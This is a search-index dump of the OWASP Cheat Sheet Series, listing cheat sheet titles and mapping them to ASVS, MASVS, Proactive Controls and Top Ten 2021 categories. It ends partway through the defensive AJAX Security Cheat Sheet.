We hope that this project provides you with excellent security guidance in an easy to read format.

You can download this site here.

An ATOM feed is available here with the latest updates.

Project leaders:

Core team:

Project links:

"},{"location":"Glossary.html","title":"Index Alphabetical","text":"

85 cheat sheets available.

Icons beside the cheat sheet name indicate in which language(s) code snippet(s) are provided.

A B C D E F G H I J K L M N O P Q R S T U V W X

"},{"location":"Glossary.html#a","title":"A","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

AJAX Security Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

Access Control Cheat Sheet.

Authorization Testing Automation Cheat Sheet.

Abuse Case Cheat Sheet.

"},{"location":"Glossary.html#b","title":"B","text":"

Bean Validation Cheat Sheet.

"},{"location":"Glossary.html#c","title":"C","text":"

Credential Stuffing Prevention Cheat Sheet.

Cryptographic Storage Cheat Sheet.

Content Security Policy Cheat Sheet.

Choosing and Using Security Questions Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Cross Site Scripting Prevention Cheat Sheet.

C-Based Toolchain Hardening Cheat Sheet.

Clickjacking Defense Cheat Sheet.

"},{"location":"Glossary.html#d","title":"D","text":"

Denial of Service Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Django REST Framework Cheat Sheet.

DOM Clobbering Prevention Cheat Sheet.

Deserialization Cheat Sheet.

Docker Security Cheat Sheet.

Database Security Cheat Sheet.

DotNet Security Cheat Sheet.

"},{"location":"Glossary.html#e","title":"E","text":"

Error Handling Cheat Sheet.

"},{"location":"Glossary.html#f","title":"F","text":"

File Upload Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"Glossary.html#g","title":"G","text":"

GraphQL Cheat Sheet.

"},{"location":"Glossary.html#h","title":"H","text":"

HTTP Headers Cheat Sheet.

HTML5 Security Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

"},{"location":"Glossary.html#i","title":"I","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Infrastructure as Code Security Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention in Java Cheat Sheet.

"},{"location":"Glossary.html#j","title":"J","text":"

JAAS Cheat Sheet.

Java Security Cheat Sheet.

JSON Web Token for Java Cheat Sheet.

"},{"location":"Glossary.html#k","title":"K","text":"

Kubernetes Security Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"Glossary.html#l","title":"L","text":"

Logging Vocabulary Cheat Sheet.

Laravel Cheat Sheet.

Logging Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

"},{"location":"Glossary.html#m","title":"M","text":"

Microservices Security Cheat Sheet.

Mass Assignment Cheat Sheet.

Microservices based Security Arch Doc Cheat Sheet.

Multifactor Authentication Cheat Sheet.

"},{"location":"Glossary.html#n","title":"N","text":"

Nodejs Security Cheat Sheet.

NodeJS Docker Cheat Sheet.

NPM Security Cheat Sheet.

Network Segmentation Cheat Sheet.

"},{"location":"Glossary.html#o","title":"O","text":"

OS Command Injection Defense Cheat Sheet.

"},{"location":"Glossary.html#p","title":"P","text":"

Pinning Cheat Sheet.

Prototype Pollution Prevention Cheat Sheet.

PHP Configuration Cheat Sheet.

Password Storage Cheat Sheet.

"},{"location":"Glossary.html#q","title":"Q","text":"

Query Parameterization Cheat Sheet.

"},{"location":"Glossary.html#r","title":"R","text":"

Ruby on Rails Cheat Sheet.

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

"},{"location":"Glossary.html#s","title":"S","text":"

SAML Security Cheat Sheet.

Secrets Management Cheat Sheet.

Session Management Cheat Sheet.

Securing Cascading Style Sheets Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Secure Cloud Architecture Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

Secure Product Design Cheat Sheet.

"},{"location":"Glossary.html#t","title":"T","text":"

Transaction Authorization Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

Third Party Javascript Management Cheat Sheet.

Threat Modeling Cheat Sheet.

"},{"location":"Glossary.html#u","title":"U","text":"

User Privacy Protection Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"Glossary.html#v","title":"V","text":"

Virtual Patching Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

Vulnerability Disclosure Cheat Sheet.

"},{"location":"Glossary.html#w","title":"W","text":"

Web Service Security Cheat Sheet.

"},{"location":"Glossary.html#x","title":"X","text":"

XSS Filter Evasion Cheat Sheet.

XS Leaks Cheat Sheet.

XML External Entity Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html","title":"ASVS Index","text":""},{"location":"IndexASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexASVS.html#objective","title":"Objective","text":"

The objective of this index is to help an OWASP Application Security Verification Standard (ASVS) user clearly identify which cheat sheets are useful for each section during his or her usage of the ASVS.

This index is based on the version 4.x of the ASVS.

"},{"location":"IndexASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":""},{"location":"IndexASVS.html#v11-secure-software-development-lifecycle-requirements","title":"V1.1 Secure Software Development Lifecycle Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexASVS.html#v12-authentication-architectural-requirements","title":"V1.2 Authentication Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v13-session-management-architectural-requirements","title":"V1.3 Session Management Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-access-control-architectural-requirements","title":"V1.4 Access Control Architectural Requirements","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v15-input-and-output-architectural-requirements","title":"V1.5 Input and Output Architectural Requirements","text":"

Abuse Case Cheat Sheet.

Deserialization Cheat Sheet.

"},{"location":"IndexASVS.html#v16-cryptographic-architectural-requirements","title":"V1.6 Cryptographic Architectural Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v17-errors-logging-and-auditing-architectural-requirements","title":"V1.7 Errors, Logging and Auditing Architectural Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v18-data-protection-and-privacy-architectural-requirements","title":"V1.8 Data Protection and Privacy Architectural Requirements","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v19-communications-architectural-requirements","title":"V1.9 Communications Architectural Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v110-malicious-software-architectural-requirements","title":"V1.10 Malicious Software Architectural Requirements","text":"

Third Party Javascript Management Cheat Sheet.

Virtual Patching Cheat Sheet.

"},{"location":"IndexASVS.html#v111-business-logic-architectural-requirements","title":"V1.11 Business Logic Architectural Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v112-secure-file-upload-architectural-requirements","title":"V1.12 Secure File Upload Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v113-api-architectural-requirements","title":"V1.13 API Architectural Requirements","text":"

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v114-configuration-architectural-requirements","title":"V1.14 Configuration Architectural Requirements","text":"

None.

"},{"location":"IndexASVS.html#v2-authentication-verification-requirements","title":"V2: Authentication Verification Requirements","text":""},{"location":"IndexASVS.html#v21-password-security-requirements","title":"V2.1 Password Security Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

Credential Stuffing Prevention Cheat Sheet

"},{"location":"IndexASVS.html#v22-general-authenticator-requirements","title":"V2.2 General Authenticator Requirements","text":"

Authentication Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v23-authenticator-lifecycle-requirements","title":"V2.3 Authenticator Lifecycle Requirements","text":"

None.

"},{"location":"IndexASVS.html#v24-credential-storage-requirements","title":"V2.4 Credential Storage Requirements","text":"

Password Storage Cheat Sheet.

"},{"location":"IndexASVS.html#v25-credential-recovery-requirements","title":"V2.5 Credential Recovery Requirements","text":"

Choosing and Using Security Questions Cheat Sheet.

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v26-look-up-secret-verifier-requirements","title":"V2.6 Look-up Secret Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v27-out-of-band-verifier-requirements","title":"V2.7 Out of Band Verifier Requirements","text":"

Forgot Password Cheat Sheet.

"},{"location":"IndexASVS.html#v28-single-or-multi-factor-one-time-verifier-requirements","title":"V2.8 Single or Multi Factor One Time Verifier Requirements","text":"

None.

"},{"location":"IndexASVS.html#v29-cryptographic-software-and-devices-verifier-requirements","title":"V2.9 Cryptographic Software and Devices Verifier Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v210-service-authentication-requirements","title":"V2.10 Service Authentication Requirements","text":"

None.

"},{"location":"IndexASVS.html#v3-session-management-verification-requirements","title":"V3: Session Management Verification Requirements","text":""},{"location":"IndexASVS.html#v31-fundamental-session-management-requirements","title":"V3.1 Fundamental Session Management Requirements","text":"

None.

"},{"location":"IndexASVS.html#v32-session-binding-requirements","title":"V3.2 Session Binding Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v33-session-logout-and-timeout-requirements","title":"V3.3 Session Logout and Timeout Requirements","text":"

Session Management Cheat Sheet.

"},{"location":"IndexASVS.html#v34-cookie-based-session-management","title":"V3.4 Cookie-based Session Management","text":"

Session Management Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v35-token-based-session-management","title":"V3.5 Token-based Session Management","text":"

JSON Web Token Cheat Sheet for Java.

REST Security Cheat Sheet.

"},{"location":"IndexASVS.html#v36-re-authentication-from-a-federation-or-assertion","title":"V3.6 Re-authentication from a Federation or Assertion","text":"

None.

"},{"location":"IndexASVS.html#v37-defenses-against-session-management-exploits","title":"V3.7 Defenses Against Session Management Exploits","text":"

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

"},{"location":"IndexASVS.html#v4-access-control-verification-requirements","title":"V4: Access Control Verification Requirements","text":""},{"location":"IndexASVS.html#v41-general-access-control-design","title":"V4.1 General Access Control Design","text":"

Access Control Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v42-operation-level-access-control","title":"V4.2 Operation Level Access Control","text":"

Insecure Direct Object Reference Prevention Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

Authorization Testing Automation.

"},{"location":"IndexASVS.html#v43-other-access-control-considerations","title":"V4.3 Other Access Control Considerations","text":"

REST Assessment Cheat Sheet.

"},{"location":"IndexASVS.html#v5-validation-sanitization-and-encoding-verification-requirements","title":"V5: Validation, Sanitization and Encoding Verification Requirements","text":""},{"location":"IndexASVS.html#v51-input-validation-requirements","title":"V5.1 Input Validation Requirements","text":"

Mass Assignment Cheat Sheet.

Input Validation Cheat Sheet.

"},{"location":"IndexASVS.html#v52-sanitization-and-sandboxing-requirements","title":"V5.2 Sanitization and Sandboxing Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v53-output-encoding-and-injection-prevention-requirements","title":"V5.3 Output encoding and Injection Prevention Requirements","text":"

XSS Prevention Cheat Sheet.

DOM based XSS Prevention Cheat Sheet.

HTML5 Security Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

Input Validation Cheat Sheet.

LDAP Injection Prevention Cheat Sheet.

OS Command Injection Defense Cheat Sheet.

Protect File Upload Against Malicious File.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

Bean Validation Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v54-memory-string-and-unmanaged-code-requirements","title":"V5.4 Memory, String, and Unmanaged Code Requirements","text":"

None.

"},{"location":"IndexASVS.html#v55-deserialization-prevention-requirements","title":"V5.5 Deserialization Prevention Requirements","text":"

Deserialization Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v6-stored-cryptography-verification-requirements","title":"V6: Stored Cryptography Verification Requirements","text":""},{"location":"IndexASVS.html#v61-data-classification","title":"V6.1 Data Classification","text":"

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

"},{"location":"IndexASVS.html#v62-algorithms","title":"V6.2 Algorithms","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v63-random-values","title":"V6.3 Random Values","text":"

None.

"},{"location":"IndexASVS.html#v64-secret-management","title":"V6.4 Secret Management","text":"

Key Management Cheat Sheet.

"},{"location":"IndexASVS.html#v7-error-handling-and-logging-verification-requirements","title":"V7: Error Handling and Logging Verification Requirements","text":""},{"location":"IndexASVS.html#v71-log-content-requirements","title":"V7.1 Log Content Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v72-log-processing-requirements","title":"V7.2 Log Processing Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v73-log-protection-requirements","title":"V7.3 Log Protection Requirements","text":"

Logging Cheat Sheet.

"},{"location":"IndexASVS.html#v74-error-handling","title":"V7.4 Error Handling","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v8-data-protection-verification-requirements","title":"V8: Data Protection Verification Requirements","text":""},{"location":"IndexASVS.html#v81-general-data-protection","title":"V8.1 General Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v82-client-side-data-protection","title":"V8.2 Client-side Data Protection","text":"

None.

"},{"location":"IndexASVS.html#v83-sensitive-private-data","title":"V8.3 Sensitive Private Data","text":"

None.

"},{"location":"IndexASVS.html#v9-communications-verification-requirements","title":"V9: Communications Verification Requirements","text":""},{"location":"IndexASVS.html#v91-communications-security-requirements","title":"V9.1 Communications Security Requirements","text":"

HTTP Strict Transport Security Cheat Sheet.

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

"},{"location":"IndexASVS.html#v92-server-communications-security-requirements","title":"V9.2 Server Communications Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v10-malicious-code-verification-requirements","title":"V10: Malicious Code Verification Requirements","text":""},{"location":"IndexASVS.html#v101-code-integrity-controls","title":"V10.1 Code Integrity Controls","text":"

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v102-malicious-code-search","title":"V10.2 Malicious Code Search","text":"

None.

"},{"location":"IndexASVS.html#v103-deployed-application-integrity-controls","title":"V10.3 Deployed Application Integrity Controls","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v11-business-logic-verification-requirements","title":"V11: Business Logic Verification Requirements","text":""},{"location":"IndexASVS.html#v111-business-logic-security-requirements","title":"V11.1 Business Logic Security Requirements","text":"

Abuse Case Cheat Sheet.

"},{"location":"IndexASVS.html#v12-file-and-resources-verification-requirements","title":"V12: File and Resources Verification Requirements","text":""},{"location":"IndexASVS.html#v121-file-upload-requirements","title":"V12.1 File Upload Requirements","text":"

Protect File Upload Against Malicious File.

"},{"location":"IndexASVS.html#v122-file-integrity-requirements","title":"V12.2 File Integrity Requirements","text":"

Protect File Upload Against Malicious File.

Third Party Javascript Management Cheat Sheet.

"},{"location":"IndexASVS.html#v123-file-execution-requirements","title":"V12.3 File execution Requirements","text":"

None.

"},{"location":"IndexASVS.html#v124-file-storage-requirements","title":"V12.4 File Storage Requirements","text":"

None.

"},{"location":"IndexASVS.html#v125-file-download-requirements","title":"V12.5 File Download Requirements","text":"

None.

"},{"location":"IndexASVS.html#v126-ssrf-protection-requirements","title":"V12.6 SSRF Protection Requirements","text":"

Server Side Request Forgery Prevention Cheat Sheet.

Unvalidated Redirects and Forwards Cheat Sheet.

"},{"location":"IndexASVS.html#v13-api-and-web-service-verification-requirements","title":"V13: API and Web Service Verification Requirements","text":""},{"location":"IndexASVS.html#v131-generic-web-service-security-verification-requirements","title":"V13.1 Generic Web Service Security Verification Requirements","text":"

Web Service Security Cheat Sheet.

Server Side Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v132-restful-web-service-verification-requirements","title":"V13.2 RESTful Web Service Verification Requirements","text":"

REST Assessment Cheat Sheet.

REST Security Cheat Sheet.

Cross-Site Request Forgery Prevention Cheat Sheet.

"},{"location":"IndexASVS.html#v133-soap-web-service-verification-requirements","title":"V13.3 SOAP Web Service Verification Requirements","text":"

XML Security Cheat Sheet.

"},{"location":"IndexASVS.html#v134-graphql-and-other-web-service-data-layer-security-requirements","title":"V13.4 GraphQL and other Web Service Data Layer Security Requirements","text":"

None.

"},{"location":"IndexASVS.html#v14-configuration-verification-requirements","title":"V14: Configuration Verification Requirements","text":""},{"location":"IndexASVS.html#v141-build","title":"V14.1 Build","text":"

Docker Security Cheat Sheet.

"},{"location":"IndexASVS.html#v142-dependency","title":"V14.2 Dependency","text":"

Docker Security Cheat Sheet.

Vulnerable Dependency Management Cheat Sheet.

"},{"location":"IndexASVS.html#v143-unintended-security-disclosure-requirements","title":"V14.3 Unintended Security Disclosure Requirements","text":"

Error Handling Cheat Sheet.

"},{"location":"IndexASVS.html#v144-http-security-headers-requirements","title":"V14.4 HTTP Security Headers Requirements","text":"

Content Security Policy Cheat Sheet.

"},{"location":"IndexASVS.html#v145-validate-http-request-header-requirements","title":"V14.5 Validate HTTP Request Header Requirements","text":"

None.

"},{"location":"IndexMASVS.html","title":"MASVS Index","text":""},{"location":"IndexMASVS.html#table-of-contents","title":"Table of Contents","text":""},{"location":"IndexMASVS.html#objective","title":"Objective","text":"

The objective of this index is to help OWASP Mobile Application Security Verification Standard (MASVS) users clearly identify which cheat sheets are useful for each section during their usage of the MASVS.

This index is based on the version 1.x.x of the MASVS.

"},{"location":"IndexMASVS.html#v1-architecture-design-and-threat-modeling-requirements","title":"V1: Architecture, Design and Threat Modeling Requirements","text":"

Threat Modeling Cheat Sheet.

Abuse Case Cheat Sheet.

Attack Surface Analysis Cheat Sheet.

"},{"location":"IndexMASVS.html#v2-data-storage-and-privacy-requirements","title":"V2: Data Storage and Privacy Requirements","text":"

Password Storage Cheat Sheet.

Abuse Case Cheat Sheet.

User Privacy Protection Cheat Sheet.

Logging Cheat Sheet.

"},{"location":"IndexMASVS.html#v3-cryptography-requirements","title":"V3: Cryptography Requirements","text":"

Cryptographic Storage Cheat Sheet.

Key Management Cheat Sheet.

"},{"location":"IndexMASVS.html#v4-authentication-and-session-management-requirements","title":"V4: Authentication and Session Management Requirements","text":"

Authentication Cheat Sheet.

Authorization Cheat Sheet.

Session Management Cheat Sheet.

Transaction Authorization Cheat Sheet.

Access Control Cheat Sheet.

JSON Web Token Cheat Sheet for Java.

Credential Stuffing Prevention Cheat Sheet.

"},{"location":"IndexMASVS.html#v5-network-communication-requirements","title":"V5: Network Communication Requirements","text":"

Transport Layer Protection Cheat Sheet.

TLS Cipher String Cheat Sheet.

HTTP Strict Transport Security Cheat Sheet.

REST Security Cheat Sheet.

Web Service Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v6-environmental-interaction-requirements","title":"V6: Environmental Interaction Requirements","text":"

None.

"},{"location":"IndexMASVS.html#v7-code-quality-and-build-setting-requirements","title":"V7: Code Quality and Build Setting Requirements","text":"

Vulnerable Dependency Management Cheat Sheet.

Error Handling Cheat Sheet.

Deserialization Cheat Sheet.

Logging Cheat Sheet.

Insecure Direct Object Reference Prevention Cheat Sheet.

Input Validation Cheat Sheet.

Injection Prevention Cheat Sheet.

Injection Prevention Cheat Sheet in Java.

OS Command Injection Defense Cheat Sheet.

Query Parameterization Cheat Sheet.

SQL Injection Prevention Cheat Sheet.

XXE Prevention Cheat Sheet.

XML Security Cheat Sheet.

"},{"location":"IndexMASVS.html#v8-resiliency-against-reverse-engineering-requirements","title":"V8: Resiliency Against Reverse Engineering Requirements","text":"

None.

"},{"location":"IndexProactiveControls.html","title":"Proactive Controls Index","text":""},{"location":"IndexProactiveControls.html#objective","title":"Objective","text":"

This cheatsheet will help users of the OWASP Proactive Controls identify which cheatsheets map to each proactive controls item. This mapping is based the OWASP Proactive Controls version 3.0 (2018).

"},{"location":"IndexProactiveControls.html#1-define-security-requirements","title":"1. Define Security Requirements","text":"

Abuse Case Cheat Sheet

Attack Surface Analysis Cheat Sheet

Threat Modeling Cheat Sheet

"},{"location":"IndexProactiveControls.html#2-leverage-security-frameworks-and-libraries","title":"2. Leverage Security Frameworks and Libraries","text":"

Clickjacking Defense Cheat Sheet

DotNet Security Cheat Sheet (A3 Cross Site Scripting)

PHP Configuration Cheat Sheet

Ruby on Rails Cheat Sheet (Tools)

Ruby on Rails Cheat Sheet (XSS)

Vulnerable Dependency Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#3-secure-database-access","title":"3. Secure Database Access","text":"

DotNet Security Cheat Sheet (Data Access)

DotNet Security Cheat Sheet (A1 SQL Injection)

Query Parameterization Cheat Sheet

Ruby on Rails Cheat Sheet (SQL Injection)

SQL Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#4-encode-and-escape-data","title":"4. Encode and Escape Data","text":"

AJAX Security Cheat Sheet (Client Side)

Cross Site Scripting Prevention Cheat Sheet

DOM based XSS Prevention Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

LDAP Injection Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#5-validate-all-inputs","title":"5. Validate All Inputs","text":"

Bean Validation Cheat Sheet

Deserialization Cheat Sheet

DotNet Security Cheat Sheet (HTTP Validation and Encoding)

DotNet Security Cheat Sheet (A8 Cross site request forgery)

DotNet Security Cheat Sheet (A10 Unvalidated redirects and forwards)

Input Validation Cheat Sheet

Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

Mass Assignment Cheat Sheet

OS Command Injection Defense Cheat Sheet

File Upload Cheat Sheet

REST Security Cheat Sheet (Input Validation)

Ruby on Rails Cheat Sheet (Command Injection)

Ruby on Rails Cheat Sheet (Mass Assignment and Strong Parameters)

Unvalidated Redirects and Forwards Cheat Sheet

XML External Entity Prevention Cheat Sheet

Server Side Request Forgery Prevention Cheat Sheet

"},{"location":"IndexProactiveControls.html#6-implement-digital-identity","title":"6. Implement Digital Identity","text":"

Authentication Cheat Sheet

Choosing and Using Security Questions Cheat Sheet

DotNet Security Cheat Sheet (Forms authentication)

DotNet Security Cheat Sheet (A2 Weak Account management)

Forgot Password Cheat Sheet

JAAS Cheat Sheet

JSON Web Token Cheat Sheet for Java

Password Storage Cheat Sheet

REST Security Cheat Sheet (JWT)

Ruby on Rails Cheat Sheet (Sessions)

Ruby on Rails Cheat Sheet (Authentication)

SAML Security Cheat Sheet

Session Management Cheat Sheet

"},{"location":"IndexProactiveControls.html#7-enforce-access-controls","title":"7. Enforce Access Controls","text":"

Access Control Cheat Sheet

Authorization Testing Automation

Credential Stuffing Prevention Cheat Sheet

Cross-Site_Request_Forgery_Prevention_Cheat_Sheet

DotNet Security Cheat Sheet (A4 Insecure Direct object references)

DotNet Security Cheat Sheet (A7 Missing function level access control)

REST Security Cheat Sheet (Access Control)

Ruby on Rails Cheat Sheet (Insecure Direct Object Reference or Forceful Browsing)

Ruby on Rails Cheat Sheet (CSRF)

Insecure Direct Object Reference Prevention Cheat Sheet

Transaction Authorization Cheat Sheet

"},{"location":"IndexProactiveControls.html#8-protect-data-everywhere","title":"8. Protect Data Everywhere","text":"

Cryptographic Storage Cheat Sheet

DotNet Security Cheat Sheet (Encryption)

DotNet Security Cheat Sheet (A6 Sensitive data exposure)

TLS Cipher String Cheat Sheet

Transport Layer Protection Cheat Sheet

Key Management Cheat Sheet

HTTP Strict Transport Security Cheat Sheet

Pinning Cheat Sheet

REST Security Cheat Sheet (HTTPS)

Ruby on Rails Cheat Sheet (Encryption)

User Privacy Protection Cheat Sheet

"},{"location":"IndexProactiveControls.html#9-implement-security-logging-and-monitoring","title":"9. Implement Security Logging and Monitoring","text":"

REST Security Cheat Sheet (Audit Logs)

Logging Cheat Sheet

"},{"location":"IndexProactiveControls.html#10-handle-all-errors-and-exceptions","title":"10. Handle All Errors and Exceptions","text":"

REST Security Cheat Sheet (Error Handling)

Error Handling Cheat Sheet

"},{"location":"IndexTopTen.html","title":"OWASP Top Ten 2021 : Related Cheat Sheets","text":"

The OWASP Top Ten is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.

This cheat sheet will help users of the OWASP Top Ten identify which cheat sheets map to each security category. This mapping is based the OWASP Top Ten 2021 version.

"},{"location":"IndexTopTen.html#a012021-broken-access-control","title":"A01:2021 \u2013 Broken Access Control","text":""},{"location":"IndexTopTen.html#a022021-cryptographic-failures","title":"A02:2021 \u2013 Cryptographic Failures","text":""},{"location":"IndexTopTen.html#a032021-injection","title":"A03:2021 \u2013 Injection","text":""},{"location":"IndexTopTen.html#a042021-insecure-design","title":"A04:2021 \u2013 Insecure Design","text":""},{"location":"IndexTopTen.html#a052021-security-misconfiguration","title":"A05:2021 \u2013 Security Misconfiguration","text":""},{"location":"IndexTopTen.html#a062021-vulnerable-and-outdated-components","title":"A06:2021 \u2013 Vulnerable and Outdated Components","text":""},{"location":"IndexTopTen.html#a072021-identification-and-authentication-failures","title":"A07:2021 \u2013 Identification and Authentication Failures","text":""},{"location":"IndexTopTen.html#a082021-software-and-data-integrity-failures","title":"A08:2021 \u2013 Software and Data Integrity Failures","text":""},{"location":"IndexTopTen.html#a092021-security-logging-and-monitoring-failures","title":"A09:2021 \u2013 Security Logging and Monitoring Failures","text":""},{"location":"IndexTopTen.html#a102021-server-side-request-forgery-ssrf","title":"A10:2021 \u2013 Server-Side Request Forgery (SSRF)","text":""},{"location":"IndexTopTen.html#a112021-next-steps","title":"A11:2021 \u2013 Next Steps","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html","title":"AJAX Security Cheat Sheet","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This document will provide a starting point for AJAX security and will hopefully be updated and expanded reasonably often to provide more detailed information about specific frameworks and technologies.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#client-side-javascript","title":"Client Side (JavaScript)","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-innertext-instead-of-innerhtml","title":"Use .innerText instead of .innerHTML","text":"

The use of .innerText will prevent most XSS problems as it will automatically encode the text.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-use-eval-new-function-or-other-code-evaluation-tools","title":"Don't use eval(), new Function() or other code evaluation tools","text":"

eval() function is evil, never use it. Needing to use eval usually indicates a problem in your design.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#canonicalize-data-to-consumer-read-encode-before-use","title":"Canonicalize data to consumer (read: encode before use)","text":"

When using data to build HTML, script, CSS, XML, JSON, etc. make sure you take into account how that data must be presented in a literal sense to keep its logical meaning.

Data should be properly encoded before used in this manner to prevent injection style issues, and to make sure the logical meaning is preserved.

Check out the OWASP Java Encoder Project.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-logic-for-security","title":"Don't rely on client logic for security","text":"

Don't forget that the user controls the client-side logic. A number of browser plugins are available to set breakpoints, skip code, change values, etc. Never rely on client logic for security.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-rely-on-client-business-logic","title":"Don't rely on client business logic","text":"

Just like the security one, make sure any interesting business rules/logic is duplicated on the server side lest a user bypasses needed logic and does something silly, or worse, costly.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code","title":"Avoid writing serialization code","text":"

This is hard and even a small mistake can cause large security issues. There are already a lot of frameworks to provide this functionality.

Take a look at the JSON page for links.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-dynamically","title":"Avoid building XML or JSON dynamically","text":"

Just like building HTML or SQL you will cause XML injection bugs, so stay away from this or at least use an encoding library or safe JSON or XML library to make attributes and element data safe.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#never-transmit-secrets-to-the-client","title":"Never transmit secrets to the client","text":"

Anything the client knows the user will also know, so keep all that secret stuff on the server please.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-encryption-in-client-side-code","title":"Don't perform encryption in client side code","text":"

Use TLS/SSL and encrypt on the server!

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#dont-perform-security-impacting-logic-on-client-side","title":"Don't perform security impacting logic on client side","text":"

This is the overall one that gets me out of trouble in case I missed something :)

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#server-side","title":"Server Side","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-csrf-protection","title":"Use CSRF Protection","text":"

Take a look at the Cross-Site Request Forgery (CSRF) Prevention cheat sheet.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#protect-against-json-hijacking-for-older-browsers","title":"Protect against JSON Hijacking for Older Browsers","text":""},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#review-angularjs-json-hijacking-defense-mechanism","title":"Review AngularJS JSON Hijacking Defense Mechanism","text":"

See the JSON Vulnerability Protection section of the AngularJS documentation.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#always-return-json-with-an-object-on-the-outside","title":"Always return JSON with an Object on the outside","text":"

